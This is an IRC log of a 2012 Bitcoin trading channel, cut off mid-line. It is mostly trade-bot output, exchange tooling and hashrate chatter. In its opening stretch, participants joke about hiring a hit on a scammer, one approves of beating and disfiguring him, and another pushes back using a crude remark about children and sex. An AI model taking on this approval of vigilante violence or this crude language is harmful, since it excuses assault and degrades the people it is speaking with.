https://bitcointalk.org/index.php?topic=104894.msg1298149#msg1298149 Oct 26 05:43:48 that's a pretty juicy read. Oct 26 05:46:04 tldr? Oct 26 05:46:12 repost of confessions of a ppt op? Oct 26 05:46:43 nah Oct 26 05:46:54 repost of mpoe-pr's story, six months later. Oct 26 05:47:07 but with moar emotion and inside angles Oct 26 05:49:25 [MPEX] [S.MPOE] 4300 @ 0.00048692 = 2.0938 BTC [-] Oct 26 05:49:25 mircea_popescu: that's somewhat good to know :P Oct 26 05:49:39 is it ? Oct 26 05:50:01 indeed Oct 26 05:51:13 is it time to hire a hit yet? Oct 26 05:51:40 the whole word is bond thing swings both ways Oct 26 05:52:26 I heard BrightAnarchist is interested in suing him Oct 26 05:53:08 dub you know how all this "hire a hit" talk sounds ? like two down and out meth whores sitting in their three year old miniskirts on the curb. they don't wear underwear because they can't afford underwear. Oct 26 05:53:16 and one goes to the other "time to call the helicopter yet ?" Oct 26 05:54:27 well its easy to take the high ground Oct 26 05:55:12 no but seriously. a hit costs money. it doesn't pay 7% a month. ergo. Oct 26 05:55:39 wait, i mean 7% a week. or a day. or WHATEVERTHEFUCK Oct 26 05:57:38 yes yes, you were right, well done. Oct 26 05:58:07 and certainly some were way to deep in that poo pond Oct 26 05:59:30 I lost pocket change but I'd happily contribute to preventing him continuing this career of fuckwitery Oct 26 06:07:11 given proximity I would gleefully mete out at least some disfigurement myself Oct 26 06:13:11 you would ?! Oct 26 06:15:05 [MPEX] [S.MPOE] 34500 @ 0.00049188 = 16.9699 BTC [+] Oct 26 06:16:30 its been a long time, to feel of skin and bone cracking under my fists, what better justice is there? Oct 26 06:19:00 I would have thought this fit with the libertarian ideal, eye for an eye oslt Oct 26 06:20:51 suppose you get arrested. Oct 26 06:25:16 avoidable but not the end of the world (btdt) Oct 26 06:30:11 no but i mean, suppose you get arrested. Oct 26 06:30:19 are you going to pay for your lawyer out of pocket ? Oct 26 06:31:57 depends on circumstances, if there was hope of winning I might, otherwise take the court appointed monkey and a conviction Oct 26 06:32:50 and all this for why ? Oct 26 06:32:57 your time would be better spent cleanning floors Oct 26 06:33:24 justice and the greater good? Oct 26 06:33:32 beating up some douche ? Oct 26 06:33:53 (a little pleasure_ Oct 26 06:34:13 a well if it's a sexual thing... Oct 26 06:34:28 yeah why not? dude that looks like elephant man will have a harder time with confidence tricks Oct 26 06:34:48 course a hit traditionally means killing him. Oct 26 06:35:10 well hit I think traditionally means 'impact' Oct 26 06:35:20 but colloquially, whatever Oct 26 06:35:34 but anyway : you're flat out wrong. dude that looks like elephant man has a much easier time scamming everyone Oct 26 06:35:40 starting with the welfare department. Oct 26 06:35:56 so you would rather what? smugly admonish the suckers and allow this scum to continue victimising people? Oct 26 06:36:06 just not trade with him anymore. Oct 26 06:36:22 well, i wasn't trading with him to begin with, for the exact reasons, but as an academic point. Oct 26 06:36:29 what about the next guy, or innocent old lady Oct 26 06:36:39 there's no innocence in ignorance. Oct 26 06:36:47 old lady should retain the services of someone who's not innocent. Oct 26 06:36:48 for a fee. Oct 26 06:41:35 [MPEX] [S.MPOE] 1916 @ 0.00048879 = 0.9365 BTC [-] Oct 26 06:41:55 perhaps cultural expectations Oct 26 06:46:10 but don't you think in principle it's more efficient to hire counsel before than to break bones after ? Oct 26 06:46:39 sure, if warranted Oct 26 06:47:04 theres a cost benefit relationship Oct 26 06:47:11 what's if warranted mean ? Oct 26 06:51:14 at high school your buddy wants to borrow $5 for a donut from the tuckshop, do you hire lawyers first or twist his arm later? Oct 26 06:51:52 replace twist arm with cry to mommy if need be Oct 26 06:53:18 I don't understand how a libertarian is in favor of adding consultation tax to every transaction in life (then I don't understand libertarians much) Oct 26 06:55:39 well for one point im not terribly concerned with a labeling, so i dunno that i am libertarian or anything. Oct 26 06:56:09 but your school example is very bad, because a. you're in close proximity and b. in most cultures kids are supposed to twist each others' arms all through kid years. Oct 26 06:56:18 doing a little more or a little less has overall little impact. Oct 26 06:57:55 suppose your wife cheats on you (and you care). do you kill her or pick a better woman next time ? Oct 26 06:57:59 well I think it translates ok Oct 26 06:58:25 a) he is acting like a child b) there are peopl ein proximity who can achieve result Oct 26 06:59:09 well, i could argue it's child abuse to try and find children to do stupid things. rather than have them beat up pirate you might as well fuck them, end result's the same. Oct 26 06:59:26 and otherwise, a system which relies on being sufficiently childish seems a little... unappealing. Oct 26 06:59:31 not to them Oct 26 07:00:25 the only way violence works in the frame you wish to use it is as a manifestation of dominance. Oct 26 07:00:28 I must go now and drink copiously Oct 26 07:00:39 if you could beat up pirate with impunity and regularity (such as the state does) then maybe. Oct 26 07:00:48 otherwise, hit and run affairs... he'll just count himself wronged. Oct 26 07:00:52 later. Oct 26 07:03:08 how well does beating someone up get your money back anyway? Oct 26 07:03:55 or what's the benefit otherwise, i don't see much to gain in it Oct 26 07:06:44 [MPEX] [S.MPOE] 2584 @ 0.00048879 = 1.263 BTC [-] Oct 26 07:06:45 [MPEX] [S.MPOE] 6851 @ 0.0004898 = 3.3556 BTC [+] Oct 26 07:31:58 [MPEX] [S.MPOE] 1781 @ 0.0004898 = 0.8723 BTC [+] Oct 26 07:31:59 [MPEX] [S.MPOE] 12852 @ 0.00049188 = 6.3216 BTC [+] Oct 26 07:32:00 [MPEX] [S.MPOE] 28164 @ 0.00049197 = 13.8558 BTC [+] Oct 26 07:57:03 [MPEX] [S.MPOE] 13000 @ 0.00048878 = 6.3541 BTC [-] Oct 26 08:22:15 [MPEX] [S.MPOE] 8200 @ 0.00048878 = 4.008 BTC [-] Oct 26 08:40:46 i summon thee mircea_popescu Oct 26 08:40:56 hm ? Oct 26 08:41:03 lol it worked Oct 26 08:42:00 lets start a bitcoin mafia to enforce gpg contracts Oct 26 08:42:08 heh Oct 26 08:42:22 ruff em up Oct 26 08:42:33 then we'll see who doesnt pay Oct 26 08:43:25 in all seriousness this months puts expire at 1159pm UTC Oct 26 Oct 26 08:43:33 correct? Oct 26 08:46:08 yea Oct 26 08:46:28 i hope there is a huge panic tomorrow Oct 26 08:46:29 lol Oct 26 08:46:47 ill profit if it drops to 10.45ish Oct 26 08:47:54 [MPEX] [S.MPOE] 10673 @ 0.0004893 = 5.2223 BTC [+] Oct 26 08:48:30 why is s.mpoe going up so high? Oct 26 08:54:02 well... i guess not that much else left. Oct 26 08:55:25 can i interview you one day warren buffet style and put it on reddit? Oct 26 08:55:57 like q: do you think the bitcoin economy will get better? Oct 26 08:56:01 haha Oct 26 08:56:54 sure. Oct 26 08:56:58 thestringpuller: what is that brown stuff on your nose? Oct 26 08:57:02 introducing the new command, STATJSON Oct 26 08:57:08 LOL Oct 26 08:57:09 jurov you'll get a kick out of this http://polimedia.us/bitcoin/faq.html#5 Oct 26 08:57:21 pigeons gots jokes Oct 26 09:00:40 bitcoin needs brokers Oct 26 09:01:24 without smickles i wouldnt have been able to get options while itm Oct 26 09:08:25 no coinbr ? Oct 26 09:08:42 coinbr isnt fully automated Oct 26 09:09:03 i would need jurov to expedite deposits Oct 26 09:09:37 smickles essentially opened a mini margin position for me Oct 26 09:09:40 a Oct 26 09:09:51 and i sent him coins Oct 26 09:10:17 get on kakobrekla's case to add mpex support in smpake Oct 26 09:10:23 LOL Oct 26 09:10:43 well its cool mpex has demand for brokerage Oct 26 09:11:10 maybe one day when im golfing i can call jurov and be all "sell sell sell sell" Oct 26 09:12:50 is smpake like an extension of green addresses? Oct 26 09:13:56 [MPEX] [S.MPOE] 14654 @ 0.00049197 = 7.2093 BTC [+] Oct 26 09:13:57 [MPEX] [S.MPOE] 10800 @ 0.0004921 = 5.3147 BTC [+] Oct 26 09:13:58 [MPEX] [S.MPOE] 21956 @ 0.00049259 = 10.8153 BTC [+] Oct 26 09:15:00 oh man its gonna hit .0005 Oct 26 09:30:45 thestringpuller spmpake is like a send money early thing Oct 26 09:32:48 [MPEX] [S.MPOE] 32900 @ 0.0004912 = 16.1605 BTC [-] Oct 26 09:32:50 [MPEX] [S.MPOE] 37527 @ 0.0004893 = 18.362 BTC [-] Oct 26 09:32:51 [MPEX] [S.MPOE] 28900 @ 0.00048878 = 14.1257 BTC [-] Oct 26 09:32:52 [MPEX] [S.MPOE] 1600 @ 0.00048692 = 0.7791 BTC [-] Oct 26 09:32:53 [MPEX] [S.MPOE] 11558 @ 0.00048633 = 5.621 BTC [-] Oct 26 09:32:55 [MPEX] [S.MPOE] 16700 @ 0.00048438 = 8.0891 BTC [-] Oct 26 09:32:56 [MPEX] [S.MPOE] 10300 @ 0.00048423 = 4.9876 BTC [-] Oct 26 09:32:57 [MPEX] [S.MPOE] 16146 @ 0.0004841 = 7.8163 BTC [-] Oct 26 09:32:57 [MPEX] [S.MPOE] 13159 @ 0.00048393 = 6.368 BTC [-] Oct 26 09:32:58 [MPEX] [S.MPOE] 15700 @ 0.00048265 = 7.5776 BTC [-] Oct 26 09:32:59 [MPEX] [S.MPOE] 39912 @ 0.00048164 = 19.2232 BTC [-] **** BEGIN LOGGING AT Fri Oct 26 14:29:22 2012 Oct 26 14:35:28 ;;ticker Oct 26 14:35:29 BTCUSD ticker | Best bid: 10.56782, Best ask: 10.59400, Bid-ask spread: 0.02618, Last trade: 10.53800, 24 hour volume: 79094.75129794, 24 hour low: 10.52000, 24 hour high: 11.37000, 24 hour vwap: 10.86052 Oct 26 14:35:36 o wouldja look at that. Oct 26 14:37:42 thestringpuller, you'll need both me and mircea to expedite deposits :) Oct 26 14:38:15 STATJSON, eh? Oct 26 14:40:07 jurov how about that. Oct 26 14:41:00 [MPEX] [S.MPOE] 7619 @ 0.00047423 = 3.6132 BTC [+] Oct 26 14:41:01 [MPEX] [S.MPOE] 5185 @ 0.00047462 = 2.4609 BTC [+] Oct 26 14:41:43 heh, apparently i have to lay down with cold to start things moving Oct 26 14:41:54 you have to what ?! Oct 26 14:42:17 oh my engrish... i got cold yesterday and went to bed soon Oct 26 14:42:23 o o Oct 26 14:42:29 haha funny how that works isnt it Oct 26 14:42:38 but srsly, it was in testing for weeks. Oct 26 14:47:03 one point : the format for stat might change in the future, but not too soon. i expect everyone who uses stats programatically to move to statjson in the coming months. Oct 26 14:47:12 then stat can be updated Oct 26 14:47:35 okay Oct 26 14:47:47 haha thestringpuller...you already know my hourly rate for development... multiply it by any odd prime and i'll do some phonesex..er.. brokerage Oct 26 14:47:54 lol Oct 26 14:49:00 prolly should ping smickles about this too. who else... brendio's not on i see Oct 26 14:51:51 ;;ticker Oct 26 14:51:52 BTCUSD ticker | Best bid: 10.60103, Best ask: 10.68729, Bid-ask spread: 0.08626, Last trade: 10.69123, 24 hour volume: 78962.39488685, 24 hour low: 10.52000, 24 hour high: 11.37000, 24 hour vwap: 10.85370 Oct 26 14:52:06 ;;bc,24hprc Oct 26 14:52:07 10.83 Oct 26 14:53:11 smickles if you arent able to push the options to jurov before 2359 utc could you exercise the options for me? Oct 26 14:56:48 they autoexercise Oct 26 15:01:13 autoexercise = lay in bed and get fit Oct 26 15:01:34 lol Oct 26 15:03:25 8.26445 FUUUUCK Oct 26 15:03:56 ? Oct 26 15:03:58 ;;ticker Oct 26 15:03:58 BTCUSD ticker | Best bid: 10.54624, Best ask: 10.62728, Bid-ask spread: 0.08104, Last trade: 10.62739, 24 hour volume: 78876.67072837, 24 hour low: 10.52000, 24 hour high: 11.37000, 24 hour vwap: 10.85330 Oct 26 15:04:02 someone got scared Oct 26 15:04:06 gtfo stop scaring me lol Oct 26 15:04:09 EUR Oct 26 15:04:11 a Oct 26 15:04:17 ;;bc,convert eur Oct 26 15:04:17 1 BTC = 10.62739 U.S. dollars = 8.21536024 Euros Oct 26 15:05:24 8.21 not .26 Oct 26 15:05:46 it changes, you know... doh! Oct 26 15:06:11 I am looking at this one http://bitcoincharts.com/markets/mtgoxEUR.html Oct 26 15:06:38 [MPEX] [S.MPOE] 13621 @ 0.00047677 = 6.4941 BTC [+] Oct 26 15:08:11 ;;ticker Oct 26 15:08:12 BTCUSD ticker | Best bid: 10.54624, Best ask: 10.62716, Bid-ask spread: 0.08092, Last trade: 10.62716, 24 hour volume: 78834.66719548, 24 hour low: 10.52000, 24 hour high: 11.37000, 24 hour vwap: 10.85285 Oct 26 15:08:26 i wonder wtf did it. Oct 26 15:12:06 what is "md5Checksum" from JSONSTAT for? Oct 26 15:16:32 padding, mostly. Oct 26 15:16:43 it does the md5hash of the section Oct 26 15:17:40 so you can use it to check sections integrity if presented with the cleartext signed document Oct 26 15:18:50 gives a little armor-y strength to cleatext without actually going armor. Oct 26 15:25:37 i guessed as much.. but can't find out how to compute the checksum Oct 26 15:26:07 for example Oct 26 15:26:09 "Book":[{"2975392":{"MPSIC":"S.MPOE", "BS":"B", "Quantity":"20000", "Price":"21000"}}, Oct 26 15:26:10 {"md5Checksum":"356265b8eb6a38ac64536447c0070954"}], Oct 26 15:26:19 tried Oct 26 15:26:22 echo -n '{"2975392":{"MPSIC":"S.MPOE", "BS":"B", "Quantity":"20000", "Price":"21000"}}' | md5sum Oct 26 15:26:25 is different Oct 26 15:27:37 those are \n not spaces in there right ? Oct 26 15:28:16 i see only \n after "Price":"21000"}}, Oct 26 15:32:32 echo -n '{"2975392":{"MPSIC":"S.MPOE", "BS":"B", "Quantity":"20000", "Price":"21000"}}, Oct 26 15:32:32 > ' | md5sum Oct 26 15:32:32 356265b8eb6a38ac64536447c0070954 - Oct 26 15:32:37 seems right ? Oct 26 15:32:40 [MPEX] [S.MPOE] 23112 @ 0.00048 = 11.0938 BTC [+] Oct 26 15:34:12 yes, right Oct 26 15:34:19 haha apparently it's already working :p Oct 26 15:34:36 *snatches this to project wiki Oct 26 15:42:28 good idea. Oct 26 15:53:54 gonna have some autoexercise now.. see you later Oct 26 15:57:47 [MPEX] [S.MPOE] 6800 @ 0.00047677 = 3.242 BTC [-] Oct 26 16:23:01 [MPEX] [S.MPOE] 35800 @ 0.00047724 = 17.0852 BTC [+] Oct 26 16:48:07 [MPEX] [S.MPOE] 11200 @ 0.00047724 = 5.3451 BTC [+] Oct 26 17:13:29 [MPEX] [S.MPOE] 4600 @ 0.00047724 = 2.1953 BTC [+] Oct 26 17:13:30 [MPEX] [S.MPOE] 39000 @ 0.00048 = 18.72 BTC [+] Oct 26 17:39:11 [MPEX] [S.MPOE] 4875 @ 0.00047677 = 2.3243 BTC [-] Oct 26 18:04:54 3 Oct 26 18:05:19 [MPEX] [S.MPOE] 27800 @ 0.00047558 = 13.2211 BTC [-] Oct 26 18:06:51 mircea_popescu: so there is JSONSTAT nao!? :D Oct 26 18:08:05 so one would just use JSONSTAT instead of stat and then per the reqest they get an pgp encrypted/signed JSON output of the STAT? Oct 26 18:08:31 mr. mircea_popescu Oct 26 18:08:48 and mr. jurov Oct 26 18:08:49 (This is going to be helpful to show the users STAT in BitOTTer -- instead of doing a bunch of parsing against the formatting. Oct 26 18:08:52 ) Oct 26 18:12:03 ;;ticker Oct 26 18:12:03 BTCUSD ticker | Best bid: 10.45101, Best ask: 10.50000, Bid-ask spread: 0.04899, Last trade: 10.50000, 24 hour volume: 74462.49957867, 24 hour low: 10.37300, 24 hour high: 11.15000, 24 hour vwap: 10.69639 Oct 26 18:30:24 [MPEX] [S.MPOE] 4628 @ 0.00047558 = 2.201 BTC [-] Oct 26 18:30:26 [MPEX] [S.MPOE] 3800 @ 0.00047487 = 1.8045 BTC [-] Oct 26 18:56:01 [MPEX] [S.MPOE] 34900 @ 0.00047351 = 16.5255 BTC [-] Oct 26 19:21:53 [MPEX] [S.MPOE] 9390 @ 0.00047072 = 4.4201 BTC [-] Oct 26 19:21:55 [MPEX] [S.MPOE] 14010 @ 0.00047061 = 6.5932 BTC [-] Oct 26 19:47:13 [MPEX] [S.MPOE] 2772 @ 0.00047351 = 1.3126 BTC [+] Oct 26 20:12:32 [MPEX] [S.MPOE] 37300 @ 0.00047378 = 17.672 BTC [+] Oct 26 20:33:15 sir MiningBuddy Oct 26 20:33:18 sir mircea_popescu Oct 26 20:33:20 * Oct 26 20:37:56 [MPEX] [S.MPOE] 5742 @ 0.00047378 = 2.7204 BTC [+] Oct 26 20:53:39 thestringpuller? Oct 26 21:03:00 ;;ticker Oct 26 21:03:01 BTCUSD ticker | Best bid: 9.88000, Best ask: 9.89919, Bid-ask spread: 0.01919, Last trade: 9.89919, 24 hour volume: 95950.94904574, 24 hour low: 9.80000, 24 hour high: 11.12590, 24 hour vwap: 10.53361 Oct 26 21:03:01 [MPEX] [S.MPOE] 26700 @ 0.00047097 = 12.5749 BTC [-] Oct 26 21:11:38 under 10 Oct 26 21:11:39 sad Oct 26 21:12:18 oops Oct 26 21:12:18 ;;bc,stats Oct 26 21:12:20 Current Blocks: 205090 | Current Difficulty: 3072321.7320208 | Next Difficulty At Block: 205631 | Next Difficulty In: 541 blocks | Next Difficulty In About: 3 days, 13 hours, 3 minutes, and 26 seconds | Next Difficulty Estimate: 3213027.65513633 | Estimated Percent Change: 4.57979129103 Oct 26 21:12:36 Chaang-Noi more fun for the rest of us Oct 26 21:12:49 ? Oct 26 21:12:58 why? Oct 26 21:13:08 cuz you are buying? Oct 26 21:14:07 because it's fun Oct 26 21:14:26 ok Oct 26 21:14:58 looks like we're getting a little bounce here before back below $10 Oct 26 21:17:35 a decent bounce Oct 26 21:18:03 i wonder if someone is just messing with the price to have options hit Oct 26 21:19:05 anyway off to bed Oct 26 21:21:03 dunno, mpoe is using 24hr average, it needs more serious nudge to be affected Oct 26 21:28:07 [MPEX] [S.MPOE] 8900 @ 0.00047061 = 4.1884 BTC [-] Oct 26 21:53:31 [MPEX] [S.MPOE] 13274 @ 0.00047061 = 6.2469 BTC [-] Oct 26 21:53:33 [MPEX] [S.MPOE] 13026 @ 0.0004701 = 6.1235 BTC [-] Oct 26 22:18:51 [MPEX] [S.MPOE] 40174 @ 0.0004701 = 18.8858 BTC [-] Oct 26 22:18:53 [MPEX] [S.MPOE] 2900 @ 0.00047009 = 1.3633 BTC [-] Oct 26 22:18:54 [MPEX] [S.MPOE] 2126 @ 0.00047 = 0.9992 BTC [-] Oct 26 22:40:31 i need to speak with senor smickles Oct 26 22:40:47 señor smickles* Oct 26 22:43:12 ;;seen smickles Oct 26 22:43:12 smickles was last seen in #bitcoin-assets 15 hours, 39 minutes, and 16 seconds ago: or what's the benefit otherwise, i don't see much to gain in it Oct 26 22:44:06 [MPEX] [S.MPOE] 7800 @ 0.00047 = 3.666 BTC [-] Oct 26 23:02:07 !ticker S.MPOE Oct 26 23:02:09 [MPEX:S.MPOE] 1day: 0.00043602 / 0.0004728 / 0.00049259 (1711086 shares, 809.00 BTC), 30day: 0.00025015 / 0.00037572 / 0.00049259 (87757519 shares, 32,972.81 BTC) Oct 26 23:10:05 [MPEX] [S.MPOE] 28815 @ 0.00047066 = 13.5621 BTC [+] Oct 26 23:22:11 anyone know how to contact smickles? Oct 26 23:33:14 ;;seen smickles Oct 26 23:33:15 smickles was last seen in #bitcoin-assets 16 hours, 29 minutes, and 19 seconds ago: or what's the benefit otherwise, i don't see much to gain in it Oct 26 23:35:08 [MPEX] [S.MPOE] 17174 @ 0.00047097 = 8.0884 BTC [+] Oct 26 23:35:09 [MPEX] [S.MPOE] 9026 @ 0.00047514 = 4.2886 BTC [+] Oct 26 23:41:02 ;;bc,24hprc Oct 26 23:41:03 10.39 Oct 26 23:41:04 ;;ticker Oct 26 23:41:05 BTCUSD ticker | Best bid: 9.94798, Best ask: 9.94800, Bid-ask spread: 0.00002, Last trade: 9.94798, 24 hour volume: 89460.44746472, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.42133 Oct 27 00:00:16 [MPEX] [S.MPOE] 4800 @ 0.00047514 = 2.2807 BTC [+] Oct 27 00:04:54 ;;calc ([bc,24hprc] - 11) / [bc,24hprc]) Oct 27 00:04:56 Error: unexpected EOF while parsing (, line 1) Oct 27 00:04:58 ;;calc ([bc,24hprc] - 11) / [bc,24hprc] Oct 27 00:04:59 -0.0607521697203 Oct 27 00:05:12 ;;calc (11 - [bc,24hprc]) / [bc,24hprc] Oct 27 00:05:13 0.0607521697203 Oct 27 00:05:46 <@assbot> [MPEX] [O.BTCUSD.P110T] 48 @ 0.0538765 = 2.5861 BTC [+] Oct 27 00:06:23 ;;calc (11 - [bc,24hprc]) / [bc,24hprc] - .0538765 Oct 27 00:06:24 0.00687566972035 Oct 27 00:06:47 ;;calc ((11 - [bc,24hprc]) / [bc,24hprc] - .0538765) * 48 Oct 27 00:06:48 0.330032146577 Oct 27 00:27:47 [MPEX] [S.MPOE] 24274 @ 0.00047514 = 11.5335 BTC [+] Oct 27 00:27:49 [MPEX] [S.MPOE] 2626 @ 0.0004757 = 1.2492 BTC [+] Oct 27 00:53:09 [MPEX] [S.MPOE] 11400 @ 0.00047471 = 5.4117 BTC [-] Oct 27 00:54:34 sup ? Oct 27 00:54:37 mod6 yup :D Oct 27 00:56:20 someone plugged something.. blocks arrive at dizzying speed Oct 27 00:56:40 ;;tslb Oct 27 00:56:42 Time since last block: 3 minutes and 30 seconds Oct 27 00:56:45 yah Oct 27 00:56:57 Network total 24.362 Thash/s Oct 27 00:57:02 it was 23 earlier today Oct 27 00:57:04 and 20 last week Oct 27 00:57:14 oh yes, our friends at ETH Zurich: http://blockchain.info/blocks/82.130.102.160 Oct 27 00:58:02 just relay neh ? Oct 27 00:58:29 no, they really mine with supercomputer..let me dig that.. Oct 27 00:59:34 http://www.syssec.ethz.ch/research/Bitcoin Oct 27 01:02:14 these are the guys that discovered doublespends and thought they cracked bitcoin iirc Oct 27 01:02:57 http://beforeitsnews.com/science-and-technology/2012/10/bitcoin-can-topple-the-might-of-banks-say-researchers-but-needs-to-be-more-secure-2475802.html ya ya Oct 27 01:03:04 looks like they want to help their budget Oct 27 01:03:38 Network total 25.184 Thash/s Oct 27 01:03:51 dude srsly. someone added 750 gh/s in 10 minutes Oct 27 01:04:17 Me ;) Oct 27 01:04:20 lol wd Oct 27 01:04:27 there goes gigavps' farm Oct 27 01:06:06 Sry mircea, I currently have ~120Gh/s, still less than giga iirc Oct 27 01:06:32 mircea_popescu: thanks! that's gonna be awesome. Oct 27 01:07:00 mod6 :D should be! Oct 27 01:07:29 I've been swammped this last 2.5 weeks... I've still done a bunch of work on bitotter's encryption parts. Got a bit more to do there and then thats nearly it. Oct 27 01:07:39 a good to hear. Oct 27 01:08:09 ;;tslb Oct 27 01:08:11 Time since last block: 5 minutes and 27 seconds Oct 27 01:08:27 Well, the JSONSTAT i'll grab once that's done and i'll be able to use that. the STAT screen is one remaining that I haven't designed yet just because I knew i'd have to just do it line at a time parsing or what not Oct 27 01:09:00 this speeds that whole thing way up. i have a bunch of reuseable code from the other JSON parsing stuff it does. Oct 27 01:09:14 :] Oct 27 01:09:19 :D Oct 27 01:10:01 you know how they say, if you don't do it today maybe tomorrow it won't need to be done anymore Oct 27 01:10:56 hehe.. like i dreaded how would i accurately distribute interest to users Oct 27 01:11:08 jurov : that's gonna be in the json :D Oct 27 01:11:32 you plan to pay it again sometime? Oct 27 01:11:38 yes. Oct 27 01:12:40 \o/ Oct 27 01:12:47 so hmm... mpoe gains 10%, btc loses 10% the next day Oct 27 01:12:49 this is eerie Oct 27 01:12:54 thats like 2 awesome things in under 10 minutes Oct 27 01:13:41 someone who bought mpoe say thursday has today the same dollar value of btc Oct 27 01:14:37 yeah -- new all time high yesterday on s.mpoe right? Oct 27 01:15:25 yea Oct 27 01:15:50 ever since all of the stuff with nefario and glbse started getting heated up, the volume dropped for btc, and leaving what seemed only good support levels at like 7, 8, 9 Oct 27 01:16:26 i doubt nefario drama has much impact Oct 27 01:16:33 it's likely the miners Oct 27 01:17:13 oh with the difficulty being what is? Oct 27 01:17:17 what is it? Oct 27 01:17:22 ;;bc,estimate Oct 27 01:17:22 3220924.68525896 Oct 27 01:17:30 is that the right one? Oct 27 01:17:35 ;;bc,stats Oct 27 01:17:37 Current Blocks: 205120 | Current Difficulty: 3072321.7320208 | Next Difficulty At Block: 205631 | Next Difficulty In: 511 blocks | Next Difficulty In About: 3 days, 8 hours, 20 minutes, and 26 seconds | Next Difficulty Estimate: 3220924.68525896 | Estimated Percent Change: 4.83682915397 Oct 27 01:17:53 supposed to jump 5% but it might be even more Oct 27 01:17:57 ;;bc,tslb Oct 27 01:17:58 Time since last block: 6 minutes and 8 seconds Oct 27 01:18:08 and another 100 gh/s added Oct 27 01:18:12 yeah wow. Oct 27 01:18:19 [MPEX] [S.MPOE] 5500 @ 0.0004757 = 2.6164 BTC [+] Oct 27 01:18:44 less than 5000 blocks left! Oct 27 01:19:18 http://bitcoinclock.com/ moving earlier into the 29th Oct 27 01:20:08 cool site :) Oct 27 01:20:22 aight gotta run for now. talk to you all a bit later! Oct 27 01:30:11 http://www.geekosystem.com/hermit-crab-mobs/ lol Oct 27 01:34:39 Network total 27.649 Thash/s Oct 27 01:34:41 holy cow Oct 27 01:35:07 2500 gh/s added past HALF HOUR Oct 27 01:35:07 still growing, would asics really be send in 3 weks? Oct 27 01:35:12 weeks* Oct 27 01:35:14 maybe so Oct 27 01:35:31 you suppose this is asicminer test run ? Oct 27 01:35:40 no more bfl Oct 27 01:42:07 eh, just people jumping on their computer after dinner and their GPU starting could explain it too... total hashing rate varies a lot during the day Oct 27 01:42:20 or just more luck finding block Oct 27 01:42:25 ;;ticker Oct 27 01:42:25 BTCUSD ticker | Best bid: 9.82206, Best ask: 9.92292, Bid-ask spread: 0.10086, Last trade: 9.93012, 24 hour volume: 95204.70588449, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.33927 Oct 27 01:42:30 total network is estimated after all. Oct 27 01:42:31 ;;bc,24hprc Oct 27 01:42:32 10.32 Oct 27 01:42:34 Network total 27.944 Thash/s Oct 27 01:42:46 it doesn't vary a lot in the sense of going to 27+, no Oct 27 01:42:47 mr. mircea_popescu good to see you tonight Oct 27 01:42:50 heya. Oct 27 01:43:07 i want an mpex account we'll talk soon Oct 27 01:43:09 ;;ticker Oct 27 01:43:09 BTCUSD ticker | Best bid: 9.82206, Best ask: 9.91787, Bid-ask spread: 0.09581, Last trade: 9.93012, 24 hour volume: 95204.70588449, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.33927 Oct 27 01:43:21 [MPEX] [S.MPOE] 15000 @ 0.00047471 = 7.1207 BTC [-] Oct 27 01:52:27 eh, about ASICMINER, I hope GLBSE release the information and they start trading again. Oct 27 01:54:44 it's possible these are their asics we're seeing Oct 27 01:57:05 But remember that a good part of the network might be from compromised machines/evening users. Users go online and network rate goes up. It's 7 PM now on the east coast Oct 27 01:57:58 Their GPU starts and hop, 2.5 terahash added Oct 27 01:58:22 2.5 terahash is only 3000 - 10000 high end radeon GPU Oct 27 02:00:48 come on Oct 27 02:00:53 this was never seen historically. Oct 27 02:00:59 http://bitcoin.sipa.be/speed-small-lin-2k.png Oct 27 02:01:23 look at the 8 hour estimate for the last weeks. Goes as low as 15 Terahash and as high as 30 Terahash Oct 27 02:01:29 It swings all the time Oct 27 02:01:49 hm Oct 27 02:01:56 maybe i haven't been paying enough attention Oct 27 02:01:58 On what period is your network total averaged? Oct 27 02:02:04 then again, i thought the number im quoting is 24h Oct 27 02:02:12 http://bitcoincharts.com/charts/ up right there Oct 27 02:02:20 iirc it was 24h but can't find a reference right now Oct 27 02:02:33 hmm, well the 1 day estimate does vary by as much as 5 ghash Oct 27 02:02:40 5 terhash* Oct 27 02:03:39 ya but it rarely went over 25 Oct 27 02:03:45 ;;bc,stats Oct 27 02:03:47 Current Blocks: 205125 | Current Difficulty: 3072321.7320208 | Next Difficulty At Block: 205631 | Next Difficulty In: 506 blocks | Next Difficulty In About: 3 days, 7 hours, 16 minutes, and 24 seconds | Next Difficulty Estimate: 3223285.30550262 | Estimated Percent Change: 4.91366421389 Oct 27 02:03:59 ;;bc,diffchange Oct 27 02:04:00 Estimated percent change in difficulty this period | 4.91366421389 % based on data since last change | 5.47811982694 % based on data for last three days Oct 27 02:04:58 eh, indeed for that Oct 27 02:04:59 fucking bfl Oct 27 02:05:21 dub you think bfl ? Oct 27 02:05:49 no, i just want my bfl asic delivered :) Oct 27 02:05:51 lol Oct 27 02:09:07 [MPEX] [S.MPOE] 22600 @ 0.00047232 = 10.6744 BTC [-] Oct 27 02:19:13 soo kinda big announcement : Oct 27 02:19:20 you can now make your own copies of mpex db Oct 27 02:20:27 http://polimedia.us/bitcoin/db_dump.php link. Oct 27 02:21:57 jurov smickles mod6 ^^ Oct 27 02:23:02 already trying to figure out how to decrypt :) Oct 27 02:23:10 hahaha Oct 27 02:23:27 i think you kinda need my private key. Oct 27 02:23:30 hopefully at least. Oct 27 02:24:01 gpg: decryption failed: No secret key Oct 27 02:24:05 dun dun dun Oct 27 02:24:23 so you want everyone to do you a backup, eh? Oct 27 02:24:40 hey, why spend my own money you know ? Oct 27 02:26:15 i should preemptively accuse you on btctalk : "MPEx scandal: relies on its users to do backups" Oct 27 02:27:34 lol Oct 27 02:27:55 https://bitcointalk.org/index.php?topic=120758.msg1300467 Oct 27 02:27:59 post there Oct 27 02:29:35 but seriously jurov i think it adds a significant level of security. Oct 27 02:29:45 well, unless someone manages to crack gpg Oct 27 02:31:48 i hope you don't compress the backup prior to export.. heard about CRIME attack Oct 27 02:31:49 ? Oct 27 02:33:12 i take a number of measures to prevent as much as possible a crack Oct 27 02:33:39 and no, there's no compression. Oct 27 02:34:44 [MPEX] [S.MPOE] 4700 @ 0.00047242 = 2.2204 BTC [+] Oct 27 02:35:22 (and also, https is bullshit) Oct 27 02:45:22 mircea_popescu: :D Oct 27 02:46:42 hehe Oct 27 02:49:20 ;;bc,nettarget Oct 27 02:49:20 Error: "bc,nettarget" is not a valid command. Oct 27 02:49:23 ;;bc,nethash Oct 27 02:49:24 23261.246072162205 Oct 27 